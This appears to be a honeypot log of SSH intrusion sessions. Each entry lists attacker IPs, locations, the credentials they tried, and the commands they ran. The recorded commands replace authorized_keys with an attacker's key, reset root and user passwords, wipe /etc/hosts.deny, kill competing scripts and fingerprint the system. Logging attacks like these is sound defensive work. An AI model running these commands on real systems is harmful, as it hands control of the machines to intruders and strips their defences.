$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—4 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:HZ05eN3lvo50"|chpasswd|bash
$ echo "root:4EuGpss61Mg2"|chpasswd|bash
$ echo "root:jwwurYeG1a5j"|chpasswd|bash
🎭 cipher_root_52 (114.34.106.146) β€” New Taipei City, Taiwan Β· 3 sessions Β· 59 cmds
2026-05-26 14:50 EDT Β· as curl/welltech12, root/fjbdfdjkdsfs541544@@, stefan/stefan
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "welltech12\nPkzNx3j1HWym\nPkzNx3j1HWym"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "welltech12\nPkzNx3j1HWym\nPkzNx3j1HWym\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:HcbDjlCgCsiu"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "stefan\nZ8fnt0CtJm49\nZ8fnt0CtJm49"|passwd|bash
$ echo "stefan\nZ8fnt0CtJm49\nZ8fnt0CtJm49\n"|passwd
🎭 wraith_root_60 (186.148.224.83) β€” Burzaco, Argentina Β· 1 session Β· 19 cmds
2026-05-26 15:02 EDT Β· as root/zaq1XSW@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:1pCGPju4G3wA"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 chai_root_13 (125.21.53.232) β€” Mumbai, India Β· 4 sessions Β· 77 cmds
2026-05-12 08:09 EDT Β· as curl/welltech12, root/college, root/fjbdfdjkdsfs541544@@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "welltech12\nk307EwOWkLNJ\nk307EwOWkLNJ"|passwd|bash
$ Enter new UNIX password:
$ echo "welltech12\nk307EwOWkLNJ\nk307EwOWkLNJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:aYyNbtgYp9Do"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ echo "root:yrKbgZpOIrM3"|chpasswd|bash
$ echo "root:SWDzuMwhUdl0"|chpasswd|bash
🎭 specter_root_58 (129.226.213.238) β€” Singapore, Singapore Β· 3 sessions Β· 58 cmds
2026-05-08 10:31 EDT Β· as curl/welltech12, root/fjbdfdjkdsfs541544@@, root/tk@123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "welltech12\nVutYs39Ol8fX\nVutYs39Ol8fX"|passwd|bash
$ Enter new UNIX password:
$ echo "welltech12\nVutYs39Ol8fX\nVutYs39Ol8fX\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:OT9oU30ZKwWZ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo "root:9bfkZHl80aQ5"|chpasswd|bash
🎭 k-pop_root_12 (175.45.200.78) β€” Seongnam-si, South Korea Β· 1 session Β· 19 cmds
2026-05-26 14:58 EDT Β· as root/zaq1XSW@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Wopjdxx0XcIf"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_18 (190.129.122.185) β€” Cochabamba, Bolivia Β· 3 sessions Β· 58 cmds
2026-05-13 14:49 EDT Β· as curl/welltech12, root/A1qwerty, root/fjbdfdjkdsfs541544@@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "welltech12\n5rpqnsw1QG7I\n5rpqnsw1QG7I"|passwd|bash
$ Enter new UNIX password:
$ echo "welltech12\n5rpqnsw1QG7I\n5rpqnsw1QG7I\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:HQtMZbvXZvmN"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo "root:m1dxADr3Z9Rx"|chpasswd|bash
🎭 tsar_root_6 (45.195.221.26) β€” Moscow, Russia Β· 2 sessions Β· 39 cmds
2026-05-26 14:09 EDT Β· as curl/welltech12, root/fjbdfdjkdsfs541544@@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:NCVE3cWtp3J8"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "welltech12\nAJsnPTLWv8LK\nAJsnPTLWv8LK"|passwd|bash
$ Enter new UNIX password:
$ echo "welltech12\nAJsnPTLWv8LK\nAJsnPTLWv8LK\n"|passwd
🎭 shadow_root_51 (169.40.3.6) β€” Riga, Latvia Β· 2 sessions Β· 39 cmds
2026-05-26 14:09 EDT Β· as curl/welltech12, root/fjbdfdjkdsfs541544@@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "welltech12\nQTMfYozTD15X\nQTMfYozTD15X"|passwd|bash
$ Enter new UNIX password:
$ echo "welltech12\nQTMfYozTD15X\nQTMfYozTD15X\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:gKxj3xmaW0ff"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 yankee_sol (32.216.51.211) β€” Stratford, United States Β· 1 session Β· 1 cmd
2026-05-26 05:34 EDT Β· as root/260587
echo
$ echo -e "\x6F\x6B"
🎭 dutch_sol_2 (176.65.139.216) β€” Eygelshoven, The Netherlands Β· 2 sessions Β· 2 cmds
2026-05-26 02:44 EDT Β· as root/Admin123!@#, user01/user01
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—2
🎭 gouda_sol_10 (176.65.139.219) β€” Eygelshoven, The Netherlands Β· 1 session Β· 1 cmd
2026-05-25 23:02 EDT Β· as user01/user01
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 cipher_root_53 (193.24.110.8) β€” Dushanbe, Tajikistan Β· 2 sessions Β· 40 cmds
2026-05-25 16:16 EDT Β· as cloud/Wangsu@2017, curl/welltech12
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "welltech12\nfG0UvqwLPWJz\nfG0UvqwLPWJz"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "welltech12\nfG0UvqwLPWJz\nfG0UvqwLPWJz\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "Wangsu@2017\nQIRu6i9UxZoL\nQIRu6i9UxZoL"|passwd|bash
$ echo "Wangsu@2017\nQIRu6i9UxZoL\nQIRu6i9UxZoL\n"|passwd
🎭 chai_root_14 (122.177.242.16) β€” Hyderabad, India Β· 3 sessions Β· 59 cmds
2026-05-25 14:30 EDT Β· as cloud/Wangsu@2017, curl/welltech12, root/1233218613
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:3s9pWsTSxVBK"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "Wangsu@2017\nLB9nh4Ko57sj\nLB9nh4Ko57sj"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "Wangsu@2017\nLB9nh4Ko57sj\nLB9nh4Ko57sj\n"|passwd
$ echo -e "welltech12\ndmM2XmtBFFxz\ndmM2XmtBFFxz"|passwd|bash
$ echo "welltech12\ndmM2XmtBFFxz\ndmM2XmtBFFxz\n"|passwd
🎭 seoul_root_16 (222.107.254.211) β€” Seocho-gu, South Korea Β· 4 sessions Β· 80 cmds
2026-05-25 13:59 EDT Β· as cloud/Wangsu@2017, curl/welltech12, kris/kris
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "Wangsu@2017\nwy5ESPISdXCL\nwy5ESPISdXCL"|passwd|bash
$ Enter new UNIX password: Γ—4
$ echo "Wangsu@2017\nwy5ESPISdXCL\nwy5ESPISdXCL\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "welltech12\nv7YN5Wxm2rKL\nv7YN5Wxm2rKL"|passwd|bash
$ echo "welltech12\nv7YN5Wxm2rKL\nv7YN5Wxm2rKL\n"|passwd
$ echo -e "rapid123\nkO0sUjwjBmSN\nkO0sUjwjBmSN"|passwd|bash
$ echo "rapid123\nkO0sUjwjBmSN\nkO0sUjwjBmSN\n"|passwd
$ echo -e "kris\n6ldNaM0lQO0v\n6ldNaM0lQO0v"|passwd|bash
$ echo "kris\n6ldNaM0lQO0v\n6ldNaM0lQO0v\n"|passwd
🎭 phantom_root_57 (125.31.2.160) β€” Zhuojiacun, Macao Β· 3 sessions Β· 59 cmds
2026-05-24 15:02 EDT Β· as cloud/Wangsu@2017, curl/welltech12, root/Abc1234!@#$
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
